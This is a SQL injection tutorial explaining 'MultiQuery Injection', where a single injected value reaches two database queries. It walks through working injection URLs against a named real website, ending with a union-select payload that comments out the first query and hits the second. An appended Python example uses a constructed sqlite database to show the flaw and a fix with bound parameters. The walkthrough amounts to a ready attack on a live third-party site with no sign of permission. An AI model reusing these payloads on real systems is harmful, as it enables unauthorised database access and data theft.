💉 MultiQuery Injection

First of all, the basic difference between Routed Query Injection and MultiQuery Injection:

In Routed Query Injection, our payload gets injected into the first query, then the output of that query gets injected into the second query, and so on.

In MultiQuery Injection, we design our payload in such a manner that it can inject two or more queries with the same injection. No output is passed from one query to another in this scenario.

Testing for MultiQuery Injection is just ordinary SQLi testing, but in the end, when we don't see any output from a union-based injection, we can try and test for MultiQuery Injection.

----------------------------------------------------------------

Let's start with the injection:

http://www.plantandem.be/home.php?p=g&id=4'

It shows the error along with the query, so we don't need to use order by, as we can see there are two columns:

----------------------------------------------------------------

Now we can directly use Union select for that:

http://www.plantandem.be/home.php?p=g&id=4 and 0=1/*!UnIOn*/Select 1,2--+

But we are not getting any output using the above query. Well, that's when it all started: I was trying to inject this site and it refused to show any output. That frustrated me a lot.

And Boooooom!!!! it gave me another error:


http://www.plantandem.be/home.php?p=g&id=4/*!UnIOn*/Select 1,2--+'

Now here's the basic logic of MultiQuery Injection. There are multiple queries on that page. When we inserted a single quote, we got the error from the first query, but the first query was not giving any output. Once we comment out the rest of the first query, we can write anything after the comment and it won't create an error there, so when we inserted a single quote after the comment, the first query passed and the second query is now the one getting injected. We can make it simpler: as we can see, there are eleven columns in the query, so we first comment out the first query and then inject the second one with eleven columns.


http://www.plantandem.be/home.php?p=g&id=4--+'and+false/*!50000union*/select+1,2,3,4,5,6,7,8,9,10,11--+'

And congrats, we got the printable column. The rest is simple, like any other injection.
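Why the same value produces an error in a different query once the comment is in place, and what closes the hole, shown as an added example (not code from the site or from this write-up). It assumes, as the final request implies, that the first query uses `id` unquoted and the second uses it inside quotes; the sqlite3 schema, table names, function names and sample inputs are constructed for illustration.

```python
import sqlite3

def make_db():
    # Constructed schema: a 2-column table and an 11-column table.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pages (id INTEGER, title TEXT)")
    db.execute("CREATE TABLE items (page_id INTEGER, "
               + ", ".join(f"c{i} TEXT" for i in range(1, 11)) + ")")
    db.execute("INSERT INTO pages VALUES (4, 'home')")
    db.execute("INSERT INTO items VALUES (4" + ", 'x'" * 10 + ")")
    return db

def render_vulnerable(db, raw_id):
    """Flawed pattern: one request value concatenated into two queries."""
    queries = [
        # Query 1 (assumed): numeric context, result never displayed.
        "SELECT id, title FROM pages WHERE id = " + raw_id,
        # Query 2 (assumed): string context, result displayed.
        "SELECT * FROM items WHERE page_id = '" + raw_id + "'",
    ]
    rows = []
    for number, sql in enumerate(queries, start=1):
        try:
            rows = db.execute(sql).fetchall()
        except sqlite3.Error:
            return ("error", number)   # which query failed to parse
    return ("rows", rows)              # only query 2's rows reach the page

def render_hardened(db, raw_id):
    """Validate once, then bind the value in every query that uses it."""
    if not (raw_id.isascii() and raw_id.isdigit()):
        return ("rejected", None)
    page_id = int(raw_id)
    db.execute("SELECT id, title FROM pages WHERE id = ?", (page_id,)).fetchall()
    rows = db.execute("SELECT * FROM items WHERE page_id = ?", (page_id,)).fetchall()
    return ("rows", rows)

# Constructed inputs shaped like the decoded id values in the requests above.
SAMPLES = ["4", "4'", "4-- '",
           "4-- ' and 0=1 union select 1,2,3,4,5,6,7,8,9,10,11-- '"]

if __name__ == "__main__":
    db = make_db()
    for s in SAMPLES:
        print(repr(s), render_vulnerable(db, s), render_hardened(db, s))
```

Fixing only the query whose error is visible leaves the second one injectable, so every statement that consumes the parameter needs the bound form.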
